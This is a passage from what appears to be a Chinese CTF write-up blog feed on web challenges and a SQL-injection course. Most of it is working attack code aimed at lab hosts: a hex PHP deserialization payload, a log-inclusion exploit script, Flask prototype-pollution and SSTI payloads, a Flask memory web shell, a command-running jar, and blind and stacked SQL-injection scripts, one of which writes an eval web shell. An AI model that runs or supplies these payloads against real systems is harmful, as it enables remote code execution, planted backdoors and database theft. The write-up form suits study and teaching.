b'\x50\x48\x50\x5F\x53\x4D\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x18\x03\x00\x00\x00\x00\x00\x00\xF8\x23\x00\x00\x00\x00\x00\x00\x10\x27\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xCF\x02\x00\x00\x00\x00\x00\x00\xF0\x02\x00\x00\x00\x00\x00\x00\x4F\x3A\x32\x38\x3A\x22\x74\x68\x69\x6E\x6B\x5C\x72\x6F\x75\x74\x65\x5C\x52\x65\x73\x6F\x75\x72\x63\x65\x52\x65\x67\x69\x73\x74\x65\x72\x22\x3A\x31\x3A\x7B\x73\x3A\x38\x3A\x22\x72\x65\x73\x6F\x75\x72\x63\x65\x22\x3B\x4F\x3A\x31\x37\x3A\x22\x74\x68\x69\x6E\x6B\x5C\x6D\x6F\x64\x65\x6C\x5C\x50\x69\x76\x6F\x74\x22\x3A\x37\x3A\x7B\x73\x3A\x39\x3A\x22\x00\x2A\x00\x73\x75\x66\x66\x69\x78\x22\x3B\x73\x3A\x34\x3A\x22\x68\x31\x78\x61\x22\x3B\x73\x3A\x38\x3A\x22\x00\x2A\x00\x74\x61\x62\x6C\x65\x22\x3B\x4F\x3A\x31\x37\x3A\x22\x74\x68\x69\x6E\x6B\x5C\x6D\x6F\x64\x65\x6C\x5C\x50\x69\x76\x6F\x74\x22\x3A\x37\x3A\x7B\x73\x3A\x39\x3A\x22\x00\x2A\x00\x73\x75\x66\x66\x69\x78\x22\x3B\x73\x3A\x34\x3A\x22\x68\x31\x78\x61\x22\x3B\x73\x3A\x38\x3A\x22\x00\x2A\x00\x74\x61\x62\x6C\x65\x22\x3B\x4E\x3B\x73\x3A\x39\x3A\x22\x00\x2A\x00\x61\x70\x70\x65\x6E\x64\x22\x3B\x61\x3A\x31\x3A\x7B\x73\x3A\x34\x3A\x22\x41\x41\x41\x41\x22\x3B\x73\x3A\x34\x3A\x22\x42\x42\x42\x42\x22\x3B\x7D\x73\x3A\x37\x3A\x22\x00\x2A\x00\x6A\x73\x6F\x6E\x22\x3B\x61\x3A\x31\x3A\x7B\x69\x3A\x30\x3B\x73\x3A\x34\x3A\x22\x42\x42\x42\x42\x22\x3B\x7D\x73\x3A\x31\x31\x3A\x22\x00\x2A\x00\x77\x69\x74\x68\x41\x74\x74\x72\x22\x3B\x61\x3A\x31\x3A\x7B\x73\x3A\x34\x3A\x22\x42\x42\x42\x42\x22\x3B\x61\x3A\x31\x3A\x7B\x73\x3A\x32\x3A\x22\x41\x41\x22\x3B\x73\x3A\x36\x3A\x22\x73\x79\x73\x74\x65\x6D\x22\x3B\x7D\x7D\x73\x3A\x37\x3A\x22\x00\x2A\x00\x64\x61\x74\x61\x22\x3B\x61\x3A\x31\x3A\x7B\x73\x3A\x34\x3A\x22\x42\x42\x42\x42\x22\x3B\x61\x3A\x31\x3A\x7B\x73\x3A\x32\x3A\x22\x41\x41\x22\x3B\x73\x3A\x33\x39\x3A\x22\x74\x61\x63\x20\x2F\x66\x2A\x20\x3E\x2F\x76\x61\x72\x2F\x77\x77\x77\x2F\x68\x74\x6D\x6C\x2F\x70\x75\x62\x6C\x69\x63\x2F\x69\x6E\x64\x65\x78\x2E\x70\x68\x70\x22\x3B\x7D\x7D\x73\x3A\x31\x32\x3A\x22\x00\x2A\x00\x6A\x73\x6F\x6E\x41\x73\x73\x6F\x63\x22\x3B\x62\x3A\x31\x3B\x7D\x73\x3A\x39\x3A\x22\x00\x2A\x00\x61\x70\x70\x65\x6E\x64\x22\x3B\x61\x3A\x31\x3A\x7B\x73\x3A\x34\x3A\x22\x41\x41\x41\x41\x22\x3B\x73\x3A\x34\x3A\x22\x42\x42\x42\x42\x22\x3B\x7D\x73\x3A\x37\x3A\x22\x00\x2A\x00\x6A\x73\x6F\x6E\x22\x3B\x61\x3A\x31\x3A\x7B\x69\x3A\x30\x3B\x73\x3A\x34\x3A\x22\x42\x42\x42\x42\x22\x3B\x7D\x73\x3A\x31\x31\x3A\x22\x00\x2A\x00\x77\x69\x74\x68\x41\x74\x74\x72\x22\x3B\x61\x3A\x31\x3A\x7B\x73\x3A\x34\x3A\x22\x42\x42\x42\x42\x22\x3B\x61\x3A\x31\x3A\x7B\x73\x3A\x32\x3A\x22\x41\x41\x22\x3B\x73\x3A\x36\x3A\x22\x73\x79\x73\x74\x65\x6D\x22\x3B\x7D\x7D\x73\x3A\x37\x3A\x22\x00\x2A\x00\x64\x61\x74\x61\x22\x3B\x61\x3A\x31\x3A\x7B\x73\x3A\x34\x3A\x22\x42\x42\x42\x42\x22\x3B\x61\x3A\x31\x3A\x7B\x73\x3A\x32\x3A\x22\x41\x41\x22\x3B\x73\x3A\x33\x39\x3A\x22\x74\x61\x63\x20\x2F\x66\x2A\x20\x3E\x2F\x76\x61\x72\x2F\x77\x77\x77\x2F\x68\x74\x6D\x6C\x2F\x70\x75\x62\x6C\x69\x63\x2F\x69\x6E\x64\x65\x78\x2E\x70\x68\x70\x22\x3B\x7D\x7D\x73\x3A\x31\x32\x3A\x22\x00\x2A\x00\x6A\x73\x6F\x6E\x41\x73\x73\x6F\x63\x22\x3B\x62\x3A\x31\x3B\x7D\x7D\x00' io = remote(address, port) # context(arch='amd64', os='linux' , log_level='debug') io.recvuntil(b'Exit\n') io.sendline(b'1') io.recvuntil(b'message:') io.sendline(data) io.recvuntil(b'Exit\n') io.sendline(b'3') time.sleep(3) io.recvuntil(b'Exit\n') io.sendline(b'3') io.interactive() </code></pre> <p>得到flag</p> <p><img src="./../../../public/pcb5-ez_java/image-20251225213813249-1766670360264-24.png" alt="image-20251225213813249" /></p> <p>ctfshow{6a810db2-4810-4043-8183-b24999c0ddcd}</p> <p><img src="./../../../public/pcb5-ez_java/image-20251225213648777-1766670360264-25.png" alt="image-20251225213648777" /></p> https://origin618.github.io/posts/dsbctf_%E5%8D%95%E8%BA%AB%E6%9D%AF-web/https://origin618.github.io/posts/dsbctf_%E5%8D%95%E8%BA%AB%E6%9D%AF-web/DSBCTF_单身杯-webTue, 23 Dec 2025 00:00:00 GMT<h1>DSBCTF_单身杯-web</h1> <h2>签到·好玩的PHP</h2> <p>代码审计</p> <p>d,s,b会被强制转成字符串类型，值互相不相等，拼接后小于3，与ctf值不相等但是md5值相等</p> <p>这里我们用尝试用PHP中的特殊浮点数常量<code>NAN</code>和<code>INF</code>，其中NAN不满足第一个if，因此这里使用INF</p> <pre><code>&lt;?php class ctfshow { private $d = 'I'; private $s = 'N'; private $b = 'F'; private $ctf = INF; $dsbctf = new ctfshow(); echo urlencod(serialize($dasctf)); } </code></pre> <pre><code>O%3A7%3A%22ctfshow%22%3A4%3A%7Bs%3A10%3A%22%00ctfshow%00d%22%3Bs%3A1%3A%22I%22%3Bs%3A10%3A%22%00ctfshow%00s%22%3Bs%3A1%3A%22N%22%3Bs%3A10%3A%22%00ctfshow%00b%22%3Bs%3A1%3A%22F%22%3Bs%3A12%3A%22%00ctfshow%00ctf%22%3Bd%3AINF%3B%7D </code></pre> <p><img src="./../../../public/pcb5-ez_java/image-20251222105108549-1766372210495-1-1766534912653-1.png" alt="image-20251222105108549" /></p> <p>ctfshow{387963bc-f4af-4d69-8142-b720d0e752c8}</p> <h2>迷雾重重</h2> <p>拿到源代码先查看控制器</p> <pre><code>&lt;?php namespace app\controller; use support\Request; use support\exception\BusinessException; class IndexController { public function index(Request $request) { return view('index/index'); } public function testUnserialize(Request $request){ if(null !== $request-&gt;get('data')){ $data = $request-&gt;get('data'); unserialize($data); } return "unserialize测试完毕"; } public function testJson(Request $request){ if(null !== $request-&gt;get('data')){ $data = json_decode($request-&gt;get('data'),true); if(null!== $data &amp;&amp; $data['name'] == 'guest'){ return view('index/view', $data); } } return "json_decode测试完毕"; } public function testSession(Request $request){ $session = $request-&gt;session(); $session-&gt;set('username',"guest"); $data = $session-&gt;get('username'); return "session测试完毕 username: ".$data; } public function testException(Request $request){ if(null != $request-&gt;get('data')){ $data = $request-&gt;get('data'); throw new BusinessException("业务异常 ".$data,3000); } return "exception测试完毕"; } } </code></pre> <p>看到<code>unserialize</code>想到构造反序列化链，但是找魔术方法发现没有可利用的</p> <p>session里面的内容不可控，只有testJson</p> <p>上传的数据经过json解码交给view解析模板</p> <p>查看/config/view.php，发现用的是原生类</p> <p><img src="./../../../public/pcb5-ez_java/image-20251222154603058-1766534912654-2.png" alt="image-20251222154603058" /></p> <p>我们跟进Raw的render方法</p> <p><img src="./../../../public/pcb5-ez_java/image-20251222181653368-1766534912654-3.png" alt="image-20251222181653368" /></p> <pre><code>public static function render(string $template, array $vars, string $app = null, string $plugin = null): string { $request = request(); $plugin = $plugin === null ? ($request-&gt;plugin ?? '') : $plugin; $configPrefix = $plugin ? "plugin.$plugin." : ''; $viewSuffix = config("{$configPrefix}view.options.view_suffix", 'html'); $app = $app === null ? ($request-&gt;app ?? '') : $app; $baseViewPath = $plugin ? base_path() . "/plugin/$plugin/app" : app_path(); $__template_path__ = $app === '' ? "$baseViewPath/view/$template.$viewSuffix" : "$baseViewPath/$app/view/$template.$viewSuffix"; if(isset($request-&gt;_view_vars)) { extract((array)$request-&gt;_view_vars); } extract($vars); ob_start(); // Try to include php file. try { include $__template_path__; } catch (Throwable $e) { ob_end_clean(); throw $e; } return ob_get_clean(); } } </code></pre> <p>我们关注extract($vars);include $<strong>template_path</strong>;</p> <p>extract($vars)能让我们修改内存中变量，造成<strong>变量覆盖漏洞</strong></p> <p>我们只需要覆盖掉<code>$__template_path__</code>即可转为<strong>文件包含漏洞</strong></p> <p>这里我们尝试包含框架日志文件，通过下面方法探测文件路径</p> <pre><code>def get_webroot(): print("[+] Getting webroot...") webroot = "" for i in range(1,300): r = requests.get(url=url+'index/testJson?data={{"name": "guest", "__template_path__": "/proc/{}/cmdline"}}'.format(i)) time.sleep(0.2) if "start.php" in r.text: print(f"[\033[31m*\033[0m] Found start.php at /proc/{i}/cmdline") webroot = r.text.split("start_file=")[1][:-10] print(f"Found webroot: {webroot}") break return webroot </code></pre> <p>我们将模板引擎覆盖为我们构造的payload，发送给服务器触发报错,使框架的日志系统将这个错误的参数值原封不动地写入当天的日志文件中</p> <pre><code>def send_shell(webroot): #payload = 'index/testJson?data={{"name":"guest","__template_path__":"&lt;?php%20`ls%20/&gt;{}/public/ls.txt`;?&gt;"}}'.format(webroot) payload = 'index/testJson?data={{"name":"guest","__template_path__":"&lt;?php%20`cat%20/s00*&gt;{}/public/flag.txt`;?&gt;"}}'.format(webroot) r = requests.get(url=url+payload) time.sleep(1) if r.status_code == 500: print("[\033[31m*\033[0m] Shell sent successfully") else: print("Failed to send shell") </code></pre> <p>最后我们让PHP引擎去运行这个日志文件，使我们构造的命令得以执行</p> <pre><code>def include_shell(webroot): now = datetime.now() payload = 'index/testJson?data={{"name":"guest","__template_path__":"{}/runtime/logs/webman-{}-{}-{}.log"}}'.format(webroot, now.strftime("%Y"), now.strftime("%m"), now.strftime("%d")) r = requests.get(url=url + payload) time.sleep(5) r = requests.get(url=url + 'flag.txt') if "ctfshow" in r.text: print("=================FLAG==================\n") print("\033[32m" + r.text + "\033[0m") print("=================FLAG==================\n") print("[\033[31m*\033[0m] Shell included successfully") else: print("Failed to include shell") </code></pre> <p>探测存在的文件</p> <p><img src="./../../../public/pcb5-ez_java/image-20251222162938411-1766534912654-4.png" alt="image-20251222162938411" /></p> <p>flag 在/s000ecretF1ag999.txt</p> <p><img src="./../../../public/pcb5-ez_java/image-20251222163135297-1766534912654-5.png" alt="image-20251222163135297" /></p> <p>ctfshow{cdc533ec-485e-4014-8d78-41182c0902e9}</p> <p>下面给出官方脚本</p> <pre><code>import requests import time from datetime import datetime # 注意 这里题目地址 应该https换成http url = "http://df5eca96-11bc-402c-83ae-523693014a25.challenge.ctf.show/" # Author: ctfshow h1xa def get_webroot(): print("[+] Getting webroot...") webroot = "" for i in range(1, 300): r = requests.get( url=url + 'index/testJson?data={{"name": "guest", "__template_path__": "/proc/{}/cmdline"}}'.format(i)) time.sleep(0.2) if "start.php" in r.text: print(f"[\033[31m*\033[0m] Found start.php at /proc/{i}/cmdline") webroot = r.text.split("start_file=")[1][:-10] print(f"Found webroot: {webroot}") break return webroot def send_shell(webroot): # payload = 'index/testJson?data={{"name":"guest","__template_path__":"&lt;?php%20`ls%20/&gt;{}/public/ls.txt`;?&gt;"}}'.format(webroot) payload = 'index/testJson?data={{"name":"guest","__template_path__":"&lt;?php%20`cat%20/s00*&gt;{}/public/flag.txt`;?&gt;"}}'.format( webroot) r = requests.get(url=url + payload) time.sleep(1) if r.status_code == 500: print("[\033[31m*\033[0m] Shell sent successfully") else: print("Failed to send shell") def include_shell(webroot): now = datetime.now() payload = 'index/testJson?data={{"name":"guest","__template_path__":"{}/runtime/logs/webman-{}-{}-{}.log"}}'.format( webroot, now.strftime("%Y"), now.strftime("%m"), now.strftime("%d")) r = requests.get(url=url + payload) time.sleep(5) r = requests.get(url=url + 'flag.txt') if "ctfshow" in r.text: print("=================FLAG==================\n") print("\033[32m" + r.text + "\033[0m") print("=================FLAG==================\n") print("[\033[31m*\033[0m] Shell included successfully") else: print("Failed to include shell") def exploit(): webroot = get_webroot() send_shell(webroot) include_shell(webroot) if __name__ == '__main__': exploit() </code></pre> <p>官方推理</p> <ul> <li>nginx apache 不存在，排除日志包含的思路</li> <li>pearcmd 由于命令行启动 这里不能使用<code>php-fpm</code>的方式 包含<code>pearcmd.php</code>来<code>getshell</code></li> <li>session 文件包含 需要找到网站部署的目录名字 进行绝对路径包含 相对路径无法定位到<code>session</code>文件</li> <li>文件上传未开启 无法包含临时文件 和 文件上传 <code>session</code></li> <li>远程文件包含 测试发现除了file协议 其他伪协议并未开启</li> </ul> <h2>ez_inject</h2> <p>注册登录后发现有个secret路由需要admin才能登陆</p> <p>我们尝试在register处污染key</p> <pre><code>import requests import json url = "http://473b22fe-1306-46d1-abd4-30ee170d7469.challenge.ctf.show/register" payload = { "username": "123", "password": "123", "__init__": {"__globals__": {"app": {"config": {"SECRET_KEY": "123"}}}}, } r = requests.post(url=url, json=payload) print(r.text) </code></pre> <p>成功之后登录，用unsign解密session，然后进行加密</p> <pre><code>D:\0Apython&gt;flask-unsign --decode --cookie "eyJpc19hZG1pbiI6MCwidXNlcm5hbWUiOiJxd2UifQ.aUkjqA.V7Qqc8mh0kuq-3mbU_ElyCM8CU0" --secret "123" {'is_admin': 0, 'username': 'qwe'} </code></pre> <p>换session后点击secret，提示在echo处 有session可以确定是flask flask的ssti注入，我们这里用盲注</p> <pre><code>cycler["__in"+"it__"]["__glo"+"bals__"] ["__bui"+"ltins__"].__import__('builtins').open('/flag').read(1)[0]=='c' </code></pre> <p>盲注</p> <p><strong><code>cycler</code></strong>: 这是 Jinja2 模板引擎（Flask 默认引擎）中的一个内置对象，用于在循环中轮换值。</p> <p><strong><code>.open('/flag').read(1)[0]</code></strong>:</p> <p><code>read(1)</code>：读取文件的前 <strong>1</strong> 个字符。</p> <p><code>[0]</code>：取出这个字符。</p> <p>官方脚本</p> <pre><code>import requests import concurrent.futures url = "http://7d26c775-19b5-4001-88e3-fbba32c4e64c.challenge.ctf.show/echo" strings = "qwertyuiopasdfghjklzxcvbnm{}-12334567890" target = "" headers = { "Content-Type": "application/x-www-form-urlencoded", "cookie":"user=eyJpc19hZG1pbiI6MSwidXNlcm5hbWUiOiJ0ZXN0In0.ZzC9AQ.hbEoNTSwLImc98ykp0j_EJ_VlnQ" } def check_character(i, j, string): payload = ''' cycler["__in"+"it__"]["__glo"+"bals__"] ["__bui"+"ltins__"].__import__('builtins').open('/flag').read({})[{}]=='{}' '''.format(j + 1, j, string) data = {"message": payload} r = requests.post(url=url, data=data, headers=headers) return string if r.status_code == 200 and "your answer is True" in r.text else None with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor: for i in range(50): futures = [] for j in range(50): for string in strings: futures.append(executor.submit(check_character, i, j, string)) for future in concurrent.futures.as_completed(futures): result = future.result() if result: print(result) target += result if result == "}": print(target) exit() </code></pre> <p>官方尝试的内存马</p> <pre><code>url_for["\137\137\147\154\157\142\141\154\163\137\137"] ["\137\137\142\165\151\154\164\151\156\163\137\137"]['eval'] ("app.after_request_funcs.setdefault(None, []).append(lambda resp: CmdResp if request.args.get('cmd') and exec(\"global CmdResp;CmdResp=__import__(\'flask\').make_response(__import__(\'os\').popen(requ est.args.get(\'cmd\')).read())\")==None else resp)", {'request':url_for["\137\137\147\154\157\142\141\154\163\137\137"] ['request'],'app':url_for["\137\137\147\154\157\142\141\154\163\137\137"] ['current_app']}) </code></pre> <p><img src="./../../../public/pcb5-ez_java/image-20251222205113542-1766534912654-7.png" alt="image-20251222205113542" /></p> <p>得到flag:ctfshow{2cfac8233-7268-4a4a-8d1a-741c090a57aa}</p> <h2>ezzz_ssti</h2> <p>测试{{3*3}，回显9，说明这里是ssti</p> <p>简单测试下发现没有过滤，但是限制了长度为40</p> <p>https://blog.csdn.net/weixin_43995419/article/details/126811287</p> <p>阅读该文章，我们可以将 Payload 保存在 config 全局对象中</p> <p>Flask 框架中存在 <strong>config 全局对象</strong>，用来保存配置信息。</p> <p>config 对象实质上是一个<strong>字典的子类</strong>，可以像字典一样操作。</p> <p>因此要更新字典，我们可以使用 Python 中字典的 <strong>update() 方法</strong>。</p> <pre><code>{%set x=config.update(a=config.update)%} </code></pre> <p>用如下语句查看字典的键有没有更新</p> <pre><code>{%print(config.a)%} </code></pre> <p><img src="./../../../public/pcb5-ez_java/image-20251224080708261-1766534912654-6.png" alt="image-20251224080708261" /></p> <p>继续</p> <pre><code>{%set x=config.a(f=lipsum.__globals__)%} //f的值被更新为lipsum.__globals__ {%set x=config.a(o=config.f.os)%} //o的值被更新为lipsum.__globals__.os {%set x=config.a(p=config.o.popen)%} //p的值被更新为lipsum.__globals__.os.popen {{config.p("cat /f*").read()}} </code></pre> <p><img src="./../../../public/pcb5-ez_java/image-20251223145408219-1766534912654-8.png" alt="image-20251223145408219" /></p> <p>ctfshow{8ae957ba-55a0-4cac-b5cf-22516ea30eea}</p> <h2>简单的文件上传</h2> <p>我们先进行测试整理信息</p> <ul> <li>可以上传.jar文件</li> <li>可以执行.jar包</li> <li>执行后有回显</li> </ul> <p>我们尝试</p> <pre><code>import java.io.BufferedReader; import java.io.InputStreamReader; public class Exploit { public static void main(String[] args) { try { // 尝试读取 /flag 文件 Process p = Runtime.getRuntime().exec("cat /flag"); BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream())); String line; while ((line = in.readLine()) != null) { System.out.println(line); // 这里的输出会显示在网页的 Output 区域 } } catch (Exception e) { e.printStackTrace(); } } } </code></pre> <p>创建 Manifest 文件</p> <pre><code>Main-Class: Exploit </code></pre> <p>打包jar:jar cvfm exploit.jar manifest.txt Exploit.class</p> <p>发现<code>java -jar</code> 命令前面加了 <code>-D java.securityManager</code> 参数</p> <p>我们先上传官方给的<code>CTFshowCodeManager.so</code>,改名为.jar</p> <pre><code>package com.ctfshow; /* loaded from: JavaEngine.jar:com/ctfshow/CTFshowCodeManager.class */ public class CTFshowCodeManager { public static native String eval(String str); static { System.load("/var/www/html/uploads/CTFshowCodeManager.jar"); } } </code></pre> <pre><code>package com.ctfshow; import java.io.IOException; /* loaded from: JavaEngine.jar:com/ctfshow/Main.class */ public class Main { public static void main(String[] args) throws IOException { CTFshowCodeManager.eval("cat /secretFlag000.txt"); } } </code></pre> <p>加载刚才的so文件，然后执行命令</p> <p><img src="./../../../public/pcb5-ez_java/image-20251223145803962-1766534912654-9.png" alt="image-20251223145803962" /></p> <p>ctfshow{e33c8c80-541f-4133-8394-f19be971f7ac}</p> https://origin618.github.io/posts/web%E5%BA%94%E7%94%A8%E5%AE%89%E5%85%A8%E4%B8%8E%E9%98%B2%E6%8A%A4%E4%B8%8B/https://origin618.github.io/posts/web%E5%BA%94%E7%94%A8%E5%AE%89%E5%85%A8%E4%B8%8E%E9%98%B2%E6%8A%A4%E4%B8%8B/Web应用安全与防护（下）Sun, 21 Dec 2025 00:00:00 GMT<h1>第五章 SQL注入漏洞与防护</h1> <h2>联合查询注入</h2> <p>随便打开一个文件并检测，发现id为注入点</p> <p>测试</p> <pre><code>?id=-1%20union%20select%201,2,3; </code></pre> <p>查询所有的表</p> <pre><code>?id=-1%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database(); </code></pre> <p><img src="./../../../public/pcb5-ez_java/image-20251219085204061-1766372386707-1.png" alt="image-20251219085204061" /></p> <p>查询users表的所有列名</p> <pre><code>?id=-1%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27and%20table_schema=database(); </code></pre> <p><img src="./../../../public/pcb5-ez_java/image-20251219085408661-1766372386707-3.png" alt="image-20251219085408661" /></p> <p>查询users表的信息</p> <pre><code>?id=-1%20union%20select%201,2,group_concat(id,%27-%27,username,%27-%27,password)%20from%20users; </code></pre> <p><img src="./../../../public/pcb5-ez_java/image-20251219085524226-1766372386707-2.png" alt="image-20251219085524226" /></p> <p>CTF{admin_secret_password}</p> <h2>布尔盲注爆破</h2> <p><img src="./../../../public/pcb5-ez_java/image-20251219112353769-1766372386707-4.png" alt="image-20251219112353769" /></p> <p>稳定脚本</p> <pre><code># exp.py import requests import string URL = "http://localhost:5055/login.php" FAIL = "script" # 登录失败时的响应头 def send_payload(payload): data = { "username": payload, "password": "anything" } resp = requests.post(URL, data=data, allow_redirects=False) return resp.text.find(FAIL) == -1 def get_length(payload_template, min_len=1, max_len=100): for l in range(min_len, max_len): payload = payload_template.format(l) if send_payload(payload): return l return None def get_string(payload_template, length): result = "" chars = string.ascii_letters + string.digits + "_{}@.-,! " for i in range(1, length+1): for c in chars: payload = payload_template.format(i, c) if send_payload(payload): result += c print(f"\r{result}", end="", flush=True) break print() return result def get_table_names(): print("[*] Getting table name length...") length = get_length("admin' and (select length(group_concat(table_name)) from information_schema.tables where table_schema=database())={};#---") print(f"[*] Table names length: {length}") print("[*] Getting table names...") names = get_string("admin' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))=ascii('{}');#---", length) print(f"[*] Table names: {names.split(',')}") return names.split(',') def get_column_names(table): print(f"[*] Getting column names length for {table}...") length = get_length(f"admin' and (select length(group_concat(column_name)) from information_schema.columns where table_name='{table}')={{}};#---") print(f"[*] Column names length: {length}") print(f"[*] Getting column names for {table}...") names = get_string(f"admin' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='{table}'),{{}},1))=ascii('{{}}');#---", length) print(f"[*] Column names: {names}") return names.split(',') def get_field(table, column, row=0): print(f"[*] Getting length of {column} in {table} row {row}...") length = get_length(f"admin' and (select length({column}) from {table} limit {row},1)={{}};#---", max_len=256) print(f"[*] Field length: {length}") if length is None: print(f"[!] Cannot determine length for {column} in {table} row {row}, skipping.") return "" print(f"[*] Getting value of {column} in {table} row {row}...") value = get_string(f"admin' and ascii(substr((select {column} from {table} limit {row},1),{{}},1))=ascii('{{}}');#---", length) print(f"[*] Value: {value}") return value if __name__ == "__main__": # 1. 获取所有表名 tables = get_table_names() # 2. 获取每个表的列名 for table in tables: columns = get_column_names(table) # 3. 获取每个表的每个字段内容 for col in columns: for row in range(2): #获取前2行 get_field(table, col, row) </code></pre> <p>快速脚本</p> <pre><code>import requests import urllib3 from concurrent.futures import ThreadPoolExecutor, as_completed import time # --- 基础配置 --- URL = "https://51707d51-abc7-40e8-a026-9d99fe149358.challenge.ctf.show/login.php" FAIL_STR = "script" # 登录失败特征字符串 MAX_THREADS = 30 # 并发线程数 # ---------------- # 环境初始化：忽略 SSL 警告并建立持久连接 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) session = requests.Session() def send_payload(payload): """核心请求函数，包含 SSL 忽略逻辑""" data = {"username": payload, "password": "any"} try: # verify=False 解决证书验证失败报错 resp = session.post(URL, data=data, verify=False, timeout=5) return FAIL_STR not in resp.text except: return False def get_length(sql_template, max_len=100): """探测目标字符串的长度""" for l in range(1, max_len): if send_payload(sql_template.format(l)): return l return 0 def guess_one_char(sql_template, index): """利用二分查找探测单个字符的 ASCII 码""" low, high = 32, 126 while low &lt;= high: mid = (low + high) // 2 # 使用 &gt; 进行二分判定 if send_payload(sql_template.format(index, mid)): low = mid + 1 else: high = mid - 1 return index, chr(low) def get_string_threaded(sql_template, length): """多线程调度提取完整字符串""" if length &lt;= 0: return "" final_result = [''] * (length + 1) with ThreadPoolExecutor(max_workers=MAX_THREADS) as executor: futures = {executor.submit(guess_one_char, sql_template, i): i for i in range(1, length + 1)} for future in as_completed(futures): idx, char = future.result() final_result[idx] = char print(f"\r[*] 实时进度: {''.join(final_result)}", end="", flush=True) print() return "".join(final_result[1:]) if __name__ == "__main__": total_start = time.time() # 第一阶段：确认数据库环境 print("--- 步骤 1: 获取数据库名 ---") db_len_sql = "admin' and (select length(database()))={};# " db_name_sql = "admin' and ascii(substr(database(),{},1)) &gt; {};# " db_len = get_length(db_len_sql) db_name = get_string_threaded(db_name_sql, db_len) print(f"[+] 数据库名: {db_name}") # 第二阶段：获取所有表名 print("\n--- 步骤 2: 获取表名 ---") table_len_sql = "admin' and (select length(group_concat(table_name)) from information_schema.tables where table_schema=database())={};# " table_name_sql = "admin' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1)) &gt; {};# " t_len = get_length(table_len_sql, max_len=500) tables_str = get_string_threaded(table_name_sql, t_len) table_list = tables_str.split(',') print(f"[+] 发现表: {table_list}") # 第三阶段：深度挖掘（重点看 users 或含有 flag 字样的表） for target_table in table_list: if target_table == 'pages': continue # 跳过不相关的表 print(f"\n--- 步骤 3: 挖掘表 [{target_table}] ---") # 获取列名 col_len_sql = f"admin' and (select length(group_concat(column_name)) from information_schema.columns where table_name='{target_table}')={{}};# " col_name_sql = f"admin' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='{target_table}'),{{}},1)) &gt; {{}};# " c_len = get_length(col_len_sql) columns_str = get_string_threaded(col_name_sql, c_len) column_list = columns_str.split(',') print(f"[+] 发现列: {column_list}") # 获取每一列的第一行数据（通常 Flag 就在这里） for col in column_list: print(f"[*] 正在提取 [{target_table}.{col}] 的数据...") data_len_sql = f"admin' and (select length({col}) from {target_table} limit 0,1)={{}};# " data_val_sql = f"admin' and ascii(substr((select {col} from {target_table} limit 0,1),{{}},1)) &gt; {{}};# " d_len = get_length(data_len_sql, max_len=200) if d_len: data_val = get_string_threaded(data_val_sql, d_len) print(f"[✔] 结果 -&gt; {data_val}") print(f"\n[*] 全部任务已完成，总耗时: {time.time() - total_start:.2f} 秒") </code></pre> <p>CTF{bool_sql_injection_is_fun}</p> <h2>堆叠注入写Shell</h2> <p>这里我们通过\转移'使得<code>username</code> 的内容是 <code>admin' AND password=</code></p> <pre><code>password=;select 0x3c3f706870206576616c28245f504f53545b315d293b3f3e into outfile "/var/www/html/1.php";%23 &amp;username=admin\ </code></pre> <p>1=system("ls");</p> <p><img src="./../../../public/pcb5-ez_java/image-20251219113253106-1766372386707-6.png" alt="image-20251219113253106" /></p> <p>CTF{sql_injection_is_fun}</p> <h2>WAF绕过</h2> <p>一样，将空格换成/**/注释绕过</p> <pre><code>import requests import urllib3 from concurrent.futures import ThreadPoolExecutor, as_completed import time # --- 基础配置 --- URL = "https://a4e5b7fa-5719-403e-abb9-64af82932a7b.challenge.ctf.show/login.php" FAIL_STR = "script" # 登录失败特征字符串 MAX_THREADS = 30 # 并发线程数 # 替换策略：将空格替换为 /**/ # 如果 /**/ 不行，可以尝试 %0a, %0b, %0c, %a0 等 SPACE_REPLACE = "/**/" # ---------------- urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) session = requests.Session() def send_payload(payload): """核心请求函数，处理空格绕过逻辑""" # 自动将 payload 中的空格转换为注释符 processed_payload = payload.replace(" ", SPACE_REPLACE) data = {"username": processed_payload, "password": "any"} try: resp = session.post(URL, data=data, verify=False, timeout=5) return FAIL_STR not in resp.text except: return False def get_length(sql_template, max_len=100): """探测目标字符串的长度""" for l in range(1, max_len): # 这里的模板依然写空格，send_payload 会自动处理 if send_payload(sql_template.format(l)): return l return 0 def guess_one_char(sql_template, index): """利用二分查找探测单个字符的 ASCII 码""" low, high = 32, 126 while low &lt;= high: mid = (low + high) // 2 if send_payload(sql_template.format(index, mid)): low = mid + 1 else: high = mid - 1 return index, chr(low) def get_string_threaded(sql_template, length): """多线程调度提取完整字符串""" if length &lt;= 0: return "" final_result = [''] * (length + 1) with ThreadPoolExecutor(max_workers=MAX_THREADS) as executor: futures = {executor.submit(guess_one_char, sql_template, i): i for i in range(1, length + 1)} for future in as_completed(futures): idx, char = future.result() final_result[idx] = char print(f"\r[*] 实时进度: {''.join(final_result)}", end="", flush=True) print() return "".join(final_result[1:]) if __name__ == "__main__": total_start = time.time() # 第一阶段：数据库名 print("--- 步骤 1: 获取数据库名 ---") db_len_sql = "admin' and (select length(database()))={};#" db_name_sql = "admin' and ascii(substr(database(),{},1))&gt;{};#" db_len = get_length(db_len_sql) print(f"[*] 长度: {db_len}") db_name = get_string_threaded(db_name_sql, db_len) print(f"[+] 数据库名: {db_name}") # 第二阶段：表名 print("\n--- 步骤 2: 获取表名 ---") # 注意：information_schema.tables 这种中间没有空格，不需要处理 table_len_sql = "admin' and (select length(group_concat(table_name)) from information_schema.tables where table_schema=database())={};#" table_name_sql = "admin' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))&gt;{};#" t_len = get_length(table_len_sql, max_len=500) tables_str = get_string_threaded(table_name_sql, t_len) table_list = tables_str.split(',') print(f"[+] 发现表: {table_list}") # 第三阶段：深度挖掘（重点关注包含 flag 关键词的表） for target_table in table_list: # 